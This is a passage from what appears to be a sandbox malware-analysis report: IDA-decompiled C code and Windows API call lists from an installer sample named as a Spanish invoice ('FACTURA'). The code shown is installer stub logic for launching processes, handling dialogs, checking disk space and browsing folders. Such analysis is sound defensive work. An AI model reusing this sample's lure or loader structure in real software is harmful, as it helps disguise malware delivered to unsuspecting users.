                                                                                                  				E004052C3(0xffffffeb, _t7); // executed
                                                                                                  				_t9 = E00405844(_t19); // executed
                                                                                                  				_t20 = _t9;
                                                                                                  				if(_t20 == _t15) {
                                                                                                  					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                  				} else {
                                                                                                  					if( *((intOrPtr*)(_t22 - 0x20)) != _t15) {
                                                                                                  						_t13 = E004066EA(_t17, _t20);
                                                                                                  						if( *((intOrPtr*)(_t22 - 0x24)) < _t15) {
                                                                                                  							if(_t13 != _t15) {
                                                                                                  								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							E004061A6( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                                                                  						}
                                                                                                  					}
                                                                                                  					_push(_t20);
                                                                                                  					CloseHandle();
                                                                                                  				}
                                                                                                  				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t22 - 4));
                                                                                                  				return 0;
                                                                                                  			}










                                                                                                  APIs
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                                                                                    • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,76F923A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                                                                                    • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                                                                                    • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                                                                                    • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                                                                                    • Part of subcall function 00405844: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                                                                                    • Part of subcall function 00405844: CloseHandle.KERNEL32(?), ref: 0040587A
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00401F47
                                                                                                    • Part of subcall function 004066EA: WaitForSingleObject.KERNEL32(?,00000064,00000000,00000000,?,?,00401EFB,?,?,?,?,?,?), ref: 004066FB
                                                                                                    • Part of subcall function 004066EA: GetExitCodeProcess.KERNEL32(?,?), ref: 0040671D
                                                                                                    • Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 2972824698-0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 96%
                                                                                                  			E00404C3F(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				struct HWND__* _v12;
                                                                                                  				signed int _v16;
                                                                                                  				signed int _v20;
                                                                                                  				intOrPtr _v24;
                                                                                                  				signed char* _v28;
                                                                                                  				long _v32;
                                                                                                  				signed int _v40;
                                                                                                  				long _v44;
                                                                                                  				signed int* _v56;
                                                                                                  				signed char* _v60;
                                                                                                  				signed int _v64;
                                                                                                  				long _v68;
                                                                                                  				void* _v72;
                                                                                                  				intOrPtr _v76;
                                                                                                  				intOrPtr _v80;
                                                                                                  				void* _v84;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				signed int _t192;
                                                                                                  				intOrPtr _t195;
                                                                                                  				intOrPtr _t197;
                                                                                                  				long _t201;
                                                                                                  				signed int _t205;
                                                                                                  				signed int _t216;
                                                                                                  				void* _t219;
                                                                                                  				void* _t220;
                                                                                                  				int _t226;
                                                                                                  				signed int _t231;
                                                                                                  				signed int _t232;
                                                                                                  				signed int _t233;
                                                                                                  				signed int _t239;
                                                                                                  				signed int _t241;
                                                                                                  				signed char _t242;
                                                                                                  				signed char _t248;
                                                                                                  				void* _t252;
                                                                                                  				void* _t254;
                                                                                                  				signed char* _t270;
                                                                                                  				signed char _t271;
                                                                                                  				long _t276;
                                                                                                  				int _t282;
                                                                                                  				signed int _t283;
                                                                                                  				long _t284;
                                                                                                  				signed int _t287;
                                                                                                  				signed int _t294;
                                                                                                  				signed char* _t302;
                                                                                                  				struct HWND__* _t306;
                                                                                                  				int _t307;
                                                                                                  				signed int* _t308;
                                                                                                  				int _t309;
                                                                                                  				long _t310;
                                                                                                  				signed int _t311;
                                                                                                  				void* _t313;
                                                                                                  				long _t314;
                                                                                                  				int _t315;
                                                                                                  				signed int _t316;
                                                                                                  				void* _t318;
                                                                                                  
                                                                                                  				_t306 = _a4;
                                                                                                  				_v12 = GetDlgItem(_t306, 0x3f9);
                                                                                                  				_v8 = GetDlgItem(_t306, 0x408);
                                                                                                  				_t318 = SendMessageW;
                                                                                                  				_v20 =  *0x7a8a68;
                                                                                                  				_t282 = 0;
                                                                                                  				_v24 =  *0x7a8a34 + 0x94;
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					L23:
                                                                                                  					if(_a8 != 0x405) {
                                                                                                  						_t285 = _a16;
                                                                                                  					} else {
                                                                                                  						_a12 = _t282;
                                                                                                  						_t285 = 1;
                                                                                                  						_a8 = 0x40f;
                                                                                                  						_a16 = 1;
                                                                                                  					}
                                                                                                  					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                                                  						_v16 = _t285;
                                                                                                  						if(_a8 == 0x413 ||  *((intOrPtr*)(_t285 + 4)) == 0x408) {
                                                                                                  							if(( *0x7a8a3d & 0x00000002) != 0) {
                                                                                                  								L41:
                                                                                                  								if(_v16 != _t282) {
                                                                                                  									_t231 = _v16;
                                                                                                  									if( *((intOrPtr*)(_t231 + 8)) == 0xfffffe3d) {
                                                                                                  										SendMessageW(_v8, 0x419, _t282,  *(_t231 + 0x5c));
                                                                                                  									}
                                                                                                  									_t232 = _v16;
                                                                                                  									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe39) {
                                                                                                  										_t285 = _v20;
                                                                                                  										_t233 =  *(_t232 + 0x5c);
                                                                                                  										if( *((intOrPtr*)(_t232 + 0xc)) != 2) {
                                                                                                  											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) & 0xffffffdf;
                                                                                                  										} else {
                                                                                                  											 *(_t233 * 0x818 + _t285 + 8) =  *(_t233 * 0x818 + _t285 + 8) | 0x00000020;
                                                                                                  										}
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L48;
                                                                                                  							}
                                                                                                  							if(_a8 == 0x413) {
                                                                                                  								L33:
                                                                                                  								_t285 = 0 | _a8 != 0x00000413;
                                                                                                  								_t239 = E00404B8D(_v8, _a8 != 0x413);
                                                                                                  								_t311 = _t239;
                                                                                                  								if(_t311 >= _t282) {
                                                                                                  									_t88 = _v20 + 8; // 0x8
                                                                                                  									_t285 = _t239 * 0x818 + _t88;
                                                                                                  									_t241 =  *_t285;
                                                                                                  									if((_t241 & 0x00000010) == 0) {
                                                                                                  										if((_t241 & 0x00000040) == 0) {
                                                                                                  											_t242 = _t241 ^ 0x00000001;
                                                                                                  										} else {
                                                                                                  											_t248 = _t241 ^ 0x00000080;
                                                                                                  											if(_t248 >= 0) {
                                                                                                  												_t242 = _t248 & 0x000000fe;
                                                                                                  											} else {
                                                                                                  												_t242 = _t248 | 0x00000001;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										 *_t285 = _t242;
                                                                                                  										E0040117D(_t311);
                                                                                                  										_a12 = _t311 + 1;
                                                                                                  										_a16 =  !( *0x7a8a3c) >> 0x00000008 & 0x00000001;
                                                                                                  										_a8 = 0x40f;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  							_t285 = _a16;
                                                                                                  							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                                                  								goto L41;
                                                                                                  							}
                                                                                                  							goto L33;
                                                                                                  						} else {
                                                                                                  							goto L48;
                                                                                                  						}
                                                                                                  					} else {
                                                                                                  						L48:
                                                                                                  						if(_a8 != 0x111) {
                                                                                                  							L56:
                                                                                                  							if(_a8 == 0x200) {
                                                                                                  								SendMessageW(_v8, 0x200, _t282, _t282);
                                                                                                  							}
                                                                                                  							if(_a8 == 0x40b) {
                                                                                                  								_t219 =  *0x7a1f04;
                                                                                                  								if(_t219 != _t282) {
                                                                                                  									ImageList_Destroy(_t219);
                                                                                                  								}
                                                                                                  								_t220 =  *0x7a1f18;
                                                                                                  								if(_t220 != _t282) {
                                                                                                  									GlobalFree(_t220);
                                                                                                  								}
                                                                                                  								 *0x7a1f04 = _t282;
                                                                                                  								 *0x7a1f18 = _t282;
                                                                                                  								 *0x7a8aa0 = _t282;
                                                                                                  							}
                                                                                                  							if(_a8 != 0x40f) {
                                                                                                  								L88:
                                                                                                  								if(_a8 == 0x420 && ( *0x7a8a3d & 0x00000001) != 0) {
                                                                                                  									_t307 = (0 | _a16 == 0x00000020) << 3;
                                                                                                  									ShowWindow(_v8, _t307);
                                                                                                  									ShowWindow(GetDlgItem(_a4, 0x3fe), _t307);
                                                                                                  								}
                                                                                                  								goto L91;
                                                                                                  							} else {
                                                                                                  								E004011EF(_t285, _t282, _t282);
                                                                                                  								_t192 = _a12;
                                                                                                  								if(_t192 != _t282) {
                                                                                                  									if(_t192 != 0xffffffff) {
                                                                                                  										_t192 = _t192 - 1;
                                                                                                  									}
                                                                                                  									_push(_t192);
                                                                                                  									_push(8);
                                                                                                  									E00404C0D();
                                                                                                  								}
                                                                                                  								if(_a16 == _t282) {
                                                                                                  									L75:
                                                                                                  									E004011EF(_t285, _t282, _t282);
                                                                                                  									_v32 =  *0x7a1f18;
                                                                                                  									_t195 =  *0x7a8a68;
                                                                                                  									_v60 = 0xf030;
                                                                                                  									_v20 = _t282;
                                                                                                  									if( *0x7a8a6c <= _t282) {
                                                                                                  										L86:
                                                                                                  										InvalidateRect(_v8, _t282, "true");
                                                                                                  										_t197 =  *0x7a79fc; // 0xb8007e
                                                                                                  										if( *((intOrPtr*)(_t197 + 0x10)) != _t282) {
                                                                                                  											E00404B48(0x3ff, 0xfffffffb, E00404B60(5));
                                                                                                  										}
                                                                                                  										goto L88;
                                                                                                  									}
                                                                                                  									_t308 = _t195 + 8;
                                                                                                  									do {
                                                                                                  										_t201 =  *((intOrPtr*)(_v32 + _v20 * 4));
                                                                                                  										if(_t201 != _t282) {
                                                                                                  											_t287 =  *_t308;
                                                                                                  											_v68 = _t201;
                                                                                                  											_v72 = 8;
                                                                                                  											if((_t287 & 0x00000001) != 0) {
                                                                                                  												_v72 = 9;
                                                                                                  												_v56 =  &(_t308[4]);
                                                                                                  												_t308[0] = _t308[0] & 0x000000fe;
                                                                                                  											}
                                                                                                  											if((_t287 & 0x00000040) == 0) {
                                                                                                  												_t205 = (_t287 & 0x00000001) + 1;
                                                                                                  												if((_t287 & 0x00000010) != 0) {
                                                                                                  													_t205 = _t205 + 3;
                                                                                                  												}
                                                                                                  											} else {
                                                                                                  												_t205 = 3;
                                                                                                  											}
                                                                                                  											_v64 = (_t205 << 0x0000000b | _t287 & 0x00000008) + (_t205 << 0x0000000b | _t287 & 0x00000008) | _t287 & 0x00000020;
                                                                                                  											SendMessageW(_v8, 0x1102, (_t287 >> 0x00000005 & 0x00000001) + 1, _v68);
                                                                                                  											SendMessageW(_v8, 0x113f, _t282,  &_v72);
                                                                                                  										}
                                                                                                  										_v20 = _v20 + 1;
                                                                                                  										_t308 =  &(_t308[0x206]);
                                                                                                  									} while (_v20 <  *0x7a8a6c);
                                                                                                  									goto L86;
                                                                                                  								} else {
                                                                                                  									_t309 = E004012E2( *0x7a1f18);
                                                                                                  									E00401299(_t309);
                                                                                                  									_t216 = 0;
                                                                                                  									_t285 = 0;
                                                                                                  									if(_t309 <= _t282) {
                                                                                                  										L74:
                                                                                                  										SendMessageW(_v12, 0x14e, _t285, _t282);
                                                                                                  										_a16 = _t309;
                                                                                                  										_a8 = 0x420;
                                                                                                  										goto L75;
                                                                                                  									} else {
                                                                                                  										goto L71;
                                                                                                  									}
                                                                                                  									do {
                                                                                                  										L71:
                                                                                                  										if( *((intOrPtr*)(_v24 + _t216 * 4)) != _t282) {
                                                                                                  											_t285 = _t285 + 1;
                                                                                                  										}
                                                                                                  										_t216 = _t216 + 1;
                                                                                                  									} while (_t216 < _t309);
                                                                                                  									goto L74;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						}
                                                                                                  						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                                                  							goto L91;
                                                                                                  						} else {
                                                                                                  							_t226 = SendMessageW(_v12, 0x147, _t282, _t282);
                                                                                                  							if(_t226 == 0xffffffff) {
                                                                                                  								goto L91;
                                                                                                  							}
                                                                                                  							_t310 = SendMessageW(_v12, 0x150, _t226, _t282);
                                                                                                  							if(_t310 == 0xffffffff ||  *((intOrPtr*)(_v24 + _t310 * 4)) == _t282) {
                                                                                                  								_t310 = 0x20;
                                                                                                  							}
                                                                                                  							E00401299(_t310);
                                                                                                  							SendMessageW(_a4, 0x420, _t282, _t310);
                                                                                                  							_a12 = _a12 | 0xffffffff;
                                                                                                  							_a16 = _t282;
                                                                                                  							_a8 = 0x40f;
                                                                                                  							goto L56;
                                                                                                  						}
                                                                                                  					}
                                                                                                  				} else {
                                                                                                  					_v32 = 0;
                                                                                                  					_v16 = 2;
                                                                                                  					 *0x7a8aa0 = _t306;
                                                                                                  					 *0x7a1f18 = GlobalAlloc(0x40,  *0x7a8a6c << 2);
                                                                                                  					_t252 = LoadBitmapW( *0x7a8a20, 0x6e);
                                                                                                  					 *0x7a1f0c =  *0x7a1f0c | 0xffffffff;
                                                                                                  					_t313 = _t252;
                                                                                                  					 *0x7a1f14 = SetWindowLongW(_v8, 0xfffffffc, E00405237);
                                                                                                  					_t254 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                                                  					 *0x7a1f04 = _t254;
                                                                                                  					ImageList_AddMasked(_t254, _t313, 0xff00ff);
                                                                                                  					SendMessageW(_v8, 0x1109, 2,  *0x7a1f04);
                                                                                                  					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                                                  						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                                                  					}
                                                                                                  					DeleteObject(_t313);
                                                                                                  					_t314 = 0;
                                                                                                  					do {
                                                                                                  						_t260 =  *((intOrPtr*)(_v24 + _t314 * 4));
                                                                                                  						if( *((intOrPtr*)(_v24 + _t314 * 4)) != _t282) {
                                                                                                  							if(_t314 != 0x20) {
                                                                                                  								_v16 = _t282;
                                                                                                  							}
                                                                                                  							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, _t282, E00406281(_t282, _t314, _t318, _t282, _t260)), _t314);
                                                                                                  						}
                                                                                                  						_t314 = _t314 + 1;
                                                                                                  					} while (_t314 < 0x21);
                                                                                                  					_t315 = _a16;
                                                                                                  					_t283 = _v16;
                                                                                                  					_push( *((intOrPtr*)(_t315 + 0x30 + _t283 * 4)));
                                                                                                  					_push(0x15);
                                                                                                  					E004041F4(_a4);
                                                                                                  					_push( *((intOrPtr*)(_t315 + 0x34 + _t283 * 4)));
                                                                                                  					_push(0x16);
                                                                                                  					E004041F4(_a4);
                                                                                                  					_t316 = 0;
                                                                                                  					_t284 = 0;
                                                                                                  					if( *0x7a8a6c <= 0) {
                                                                                                  						L19:
                                                                                                  						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						_t302 = _v20 + 8;
                                                                                                  						_v28 = _t302;
                                                                                                  						do {
                                                                                                  							_t270 =  &(_t302[0x10]);
                                                                                                  							if( *_t270 != 0) {
                                                                                                  								_v60 = _t270;
                                                                                                  								_t271 =  *_t302;
                                                                                                  								_t294 = 0x20;
                                                                                                  								_v84 = _t284;
                                                                                                  								_v80 = 0xffff0002;
                                                                                                  								_v76 = 0xd;
                                                                                                  								_v64 = _t294;
                                                                                                  								_v40 = _t316;
                                                                                                  								_v68 = _t271 & _t294;
                                                                                                  								if((_t271 & 0x00000002) == 0) {
                                                                                                  									if((_t271 & 0x00000004) == 0) {
                                                                                                  										 *( *0x7a1f18 + _t316 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                                                  									} else {
                                                                                                  										_t284 = SendMessageW(_v8, 0x110a, 3, _t284);
                                                                                                  									}
                                                                                                  								} else {
                                                                                                  									_v76 = 0x4d;
                                                                                                  									_v44 = 1;
                                                                                                  									_t276 = SendMessageW(_v8, 0x1132, 0,  &_v84);
                                                                                                  									_v32 = 1;
                                                                                                  									 *( *0x7a1f18 + _t316 * 4) = _t276;
                                                                                                  									_t284 =  *( *0x7a1f18 + _t316 * 4);
                                                                                                  								}
                                                                                                  							}
                                                                                                  							_t316 = _t316 + 1;
                                                                                                  							_t302 =  &(_v28[0x818]);
                                                                                                  							_v28 = _t302;
                                                                                                  						} while (_t316 <  *0x7a8a6c);
                                                                                                  						if(_v32 != 0) {
                                                                                                  							L20:
                                                                                                  							if(_v16 != 0) {
                                                                                                  								E00404229(_v8);
                                                                                                  								_t282 = 0;
                                                                                                  								goto L23;
                                                                                                  							} else {
                                                                                                  								ShowWindow(_v12, 5);
                                                                                                  								E00404229(_v12);
                                                                                                  								L91:
                                                                                                  								return E0040425B(_a8, _a12, _a16);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L19;
                                                                                                  					}
                                                                                                  				}
                                                                                                  			}


                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,000003F9), ref: 00404C57
                                                                                                  • GetDlgItem.USER32(?,00000408), ref: 00404C62
                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CAC
                                                                                                  • LoadBitmapW.USER32(0000006E), ref: 00404CBF
                                                                                                  • SetWindowLongW.USER32(?,000000FC,00405237), ref: 00404CD8
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CEC
                                                                                                  • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CFE
                                                                                                  • SendMessageW.USER32(?,00001109,00000002), ref: 00404D14
                                                                                                  • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D20
                                                                                                  • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D32
                                                                                                  • DeleteObject.GDI32(00000000), ref: 00404D35
                                                                                                  • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D60
                                                                                                  • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D6C
                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E02
                                                                                                  • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E2D
                                                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E41
                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00404E70
                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E7E
                                                                                                  • ShowWindow.USER32(?,00000005), ref: 00404E8F
                                                                                                  • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F8C
                                                                                                  • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FF1
                                                                                                  • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405006
                                                                                                  • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040502A
                                                                                                  • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040504A
                                                                                                  • ImageList_Destroy.COMCTL32(?), ref: 0040505F
                                                                                                  • GlobalFree.KERNEL32(?), ref: 0040506F
                                                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050E8
                                                                                                  • SendMessageW.USER32(?,00001102,?,?), ref: 00405191
                                                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051A0
                                                                                                  • InvalidateRect.USER32(?,00000000,?), ref: 004051C0
                                                                                                  • ShowWindow.USER32(?,00000000), ref: 0040520E
                                                                                                  • GetDlgItem.USER32(?,000003FE), ref: 00405219
                                                                                                  • ShowWindow.USER32(00000000), ref: 00405220
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                  • String ID: $M$N
                                                                                                  • API String ID: 1638840714-813528018
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 78%
                                                                                                  			E004046C3(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                  				signed int _v8;
                                                                                                  				signed int _v12;
                                                                                                  				long _v16;
                                                                                                  				long _v20;
                                                                                                  				long _v24;
                                                                                                  				char _v28;
                                                                                                  				intOrPtr _v32;
                                                                                                  				long _v36;
                                                                                                  				char _v40;
                                                                                                  				unsigned int _v44;
                                                                                                  				signed int _v48;
                                                                                                  				WCHAR* _v56;
                                                                                                  				intOrPtr _v60;
                                                                                                  				intOrPtr _v64;
                                                                                                  				intOrPtr _v68;
                                                                                                  				WCHAR* _v72;
                                                                                                  				void _v76;
                                                                                                  				struct HWND__* _v80;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				intOrPtr _t82;
                                                                                                  				long _t87;
                                                                                                  				short* _t89;
                                                                                                  				void* _t95;
                                                                                                  				signed int _t96;
                                                                                                  				int _t109;
                                                                                                  				signed short _t114;
                                                                                                  				signed int _t118;
                                                                                                  				struct HWND__** _t122;
                                                                                                  				intOrPtr* _t138;
                                                                                                  				WCHAR* _t146;
                                                                                                  				intOrPtr _t147;
                                                                                                  				unsigned int _t150;
                                                                                                  				signed int _t152;
                                                                                                  				unsigned int _t156;
                                                                                                  				signed int _t158;
                                                                                                  				signed int* _t159;
                                                                                                  				signed int* _t160;
                                                                                                  				struct HWND__* _t166;
                                                                                                  				struct HWND__* _t167;
                                                                                                  				int _t169;
                                                                                                  				unsigned int _t197;
                                                                                                  
                                                                                                  				_t156 = __edx;
                                                                                                  				_t82 =  *0x7a0ef8; // 0xb7d614
                                                                                                  				_v32 = _t82;
                                                                                                  				_t2 = _t82 + 0x3c; // 0x0
                                                                                                  				_t3 = _t82 + 0x38; // 0x0
                                                                                                  				_t146 = ( *_t2 << 0xb) + 0x7a9000;
                                                                                                  				_v12 =  *_t3;
                                                                                                  				if(_a8 == 0x40b) {
                                                                                                  					E004058A5(0x3fb, _t146);
                                                                                                  					E004064F3(_t146);
                                                                                                  				}
                                                                                                  				_t167 = _a4;
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					L8:
                                                                                                  					if(_a8 != 0x111) {
                                                                                                  						L20:
                                                                                                  						if(_a8 == 0x40f) {
                                                                                                  							L22:
                                                                                                  							_v8 = _v8 & 0x00000000;
                                                                                                  							_v12 = _v12 & 0x00000000;
                                                                                                  							E004058A5(0x3fb, _t146);
                                                                                                  							if(E00405C38(_t186, _t146) == 0) {
                                                                                                  								_v8 = 1;
                                                                                                  							}
                                                                                                  							E0040625F(0x79fef0, _t146);
                                                                                                  							_t87 = E00406639("true");
                                                                                                  							_v16 = _t87;
                                                                                                  							if(_t87 == 0) {
                                                                                                  								L30:
                                                                                                  								E0040625F(0x79fef0, _t146);
                                                                                                  								_t89 = E00405BDB(0x79fef0);
                                                                                                  								_t158 = 0;
                                                                                                  								if(_t89 != 0) {
                                                                                                  									 *_t89 = 0;
                                                                                                  								}
                                                                                                  								if(GetDiskFreeSpaceW(0x79fef0,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                  									goto L35;
                                                                                                  								} else {
                                                                                                  									_t169 = 0x400;
                                                                                                  									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                  									asm("cdq");
                                                                                                  									_v48 = _t109;
                                                                                                  									_v44 = _t156;
                                                                                                  									_v12 = 1;
                                                                                                  									goto L36;
                                                                                                  								}
                                                                                                  							} else {
                                                                                                  								_t159 = 0;
                                                                                                  								if(0 == 0x79fef0) {
                                                                                                  									goto L30;
                                                                                                  								} else {
                                                                                                  									goto L26;
                                                                                                  								}
                                                                                                  								while(1) {
                                                                                                  									L26:
                                                                                                  									_t114 = _v16(0x79fef0,  &_v48,  &_v28,  &_v40);
                                                                                                  									if(_t114 != 0) {
                                                                                                  										break;
                                                                                                  									}
                                                                                                  									if(_t159 != 0) {
                                                                                                  										 *_t159 =  *_t159 & _t114;
                                                                                                  									}
                                                                                                  									_t160 = E00405B7C(0x79fef0);
                                                                                                  									 *_t160 =  *_t160 & 0x00000000;
                                                                                                  									_t159 = _t160;
                                                                                                  									 *_t159 = 0x5c;
                                                                                                  									if(_t159 != 0x79fef0) {
                                                                                                  										continue;
                                                                                                  									} else {
                                                                                                  										goto L30;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t150 = _v44;
                                                                                                  								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                                                                  								_v44 = _t150 >> 0xa;
                                                                                                  								_v12 = 1;
                                                                                                  								_t158 = 0;
                                                                                                  								__eflags = 0;
                                                                                                  								L35:
                                                                                                  								_t169 = 0x400;
                                                                                                  								L36:
                                                                                                  								_t95 = E00404B60(5);
                                                                                                  								if(_v12 != _t158) {
                                                                                                  									_t197 = _v44;
                                                                                                  									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                                                                  										_v8 = 2;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t147 =  *0x7a79fc; // 0xb8007e
                                                                                                  								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                                                                  									E00404B48(0x3ff, 0xfffffffb, _t95);
                                                                                                  									if(_v12 == _t158) {
                                                                                                  										SetDlgItemTextW(_a4, _t169, 0x79fee0);
                                                                                                  									} else {
                                                                                                  										E00404A7F(_t169, 0xfffffffc, _v48, _v44);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								_t96 = _v8;
                                                                                                  								 *0x7a8ae4 = _t96;
                                                                                                  								if(_t96 == _t158) {
                                                                                                  									_v8 = E0040140B(7);
                                                                                                  								}
                                                                                                  								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                                                                  									_v8 = _t158;
                                                                                                  								}
                                                                                                  								E00404216(0 | _v8 == _t158);
                                                                                                  								if(_v8 == _t158 &&  *0x7a1f10 == _t158) {
                                                                                                  									E0040461C();
                                                                                                  								}
                                                                                                  								 *0x7a1f10 = _t158;
                                                                                                  								goto L53;
                                                                                                  							}
                                                                                                  						}
                                                                                                  						_t186 = _a8 - 0x405;
                                                                                                  						if(_a8 != 0x405) {
                                                                                                  							goto L53;
                                                                                                  						}
                                                                                                  						goto L22;
                                                                                                  					}
                                                                                                  					_t118 = _a12 & 0x0000ffff;
                                                                                                  					if(_t118 != 0x3fb) {
                                                                                                  						L12:
                                                                                                  						if(_t118 == 0x3e9) {
                                                                                                  							_t152 = 7;
                                                                                                  							memset( &_v76, 0, _t152 << 2);
                                                                                                  							_v80 = _t167;
                                                                                                  							_v72 = 0x7a1f20;
                                                                                                  							_v60 = E00404A19;
                                                                                                  							_v56 = _t146;
                                                                                                  							_v68 = E00406281(_t146, 0x7a1f20, _t167, 0x7a06f8, _v12);
                                                                                                  							_t122 =  &_v80;
                                                                                                  							_v64 = 0x41;
                                                                                                  							__imp__SHBrowseForFolderW(_t122);
                                                                                                  							if(_t122 == 0) {
                                                                                                  								_a8 = 0x40f;
                                                                                                  							} else {
                                                                                                  								__imp__CoTaskMemFree(_t122);
                                                                                                  								E00405B30(_t146);
                                                                                                  								_t125 =  *((intOrPtr*)( *0x7a8a34 + 0x11c));
                                                                                                  								if( *((intOrPtr*)( *0x7a8a34 + 0x11c)) != 0 && _t146 == L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated") {
                                                                                                  									E00406281(_t146, 0x7a1f20, _t167, 0, _t125);
                                                                                                  									if(lstrcmpiW(0x7a69c0, 0x7a1f20) != 0) {
                                                                                                  										lstrcatW(_t146, 0x7a69c0);
                                                                                                  									}
                                                                                                  								}
                                                                                                  								 *0x7a1f10 =  *0x7a1f10 + 1;
                                                                                                  								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                                                                  							}
                                                                                                  						}
                                                                                                  						goto L20;
                                                                                                  					}
                                                                                                  					if(_a12 >> 0x10 != 0x300) {
                                                                                                  						goto L53;
                                                                                                  					}
                                                                                                  					_a8 = 0x40f;
                                                                                                  					goto L12;
                                                                                                  				} else {
                                                                                                  					_t166 = GetDlgItem(_t167, 0x3fb);
                                                                                                  					if(E00405BA7(_t146) != 0 && E00405BDB(_t146) == 0) {
